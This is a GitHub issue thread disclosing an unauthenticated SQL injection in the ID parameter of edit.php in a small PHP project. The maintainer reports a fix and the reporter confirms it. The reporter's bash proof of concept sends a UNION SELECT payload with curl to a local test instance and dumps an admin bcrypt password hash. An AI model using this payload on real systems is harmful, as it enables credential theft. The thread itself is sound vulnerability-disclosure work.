### ISSUE TITLE
Unauthenticated SQL injection vulnerability in ID parameter of edit.php page

### ISSUE THREAD

**Issue by 1337kid** [kiduswb/minimati#1]
**edit.php** allows unauthenticated users to input SQL queries resulting in data retrieval from the database.
ID parameter is vulnerable to UNION query, boolean-based blind and time-based blind.

The below bash script illustrates how an attacker can take advantage of the vulnerability to dump admin's password hash 

```bash
#!/bin/bash
encoded="1%20UNION%20ALL%20SELECT%201,1,1,group_concat(pwd_hash),1,1,1%20from%20admin%20--%20-"
req=$(curl -s http://127.0.0.1/edit.php?ID=$encoded | grep "subtitle" | awk '{print $3}' | awk -F '=' '{print $2}')
echo $req

#=== output
# "$2y$10$9kOSNNKcDj/wh4LcVZJwvun4ywsmlXnOf6SQcu0hAWTMLdCHkacfS"
```

**Comment by kiduswb** [comment]
I've committed a fix recently. Please verify it if you have the time. Thank you for taking time out of your day and helping me out!

**Comment by 1337kid** [comment]
Sure, I'm happy to help xD.<br>
Also I have checked the updated one, it isn't vulnerable.
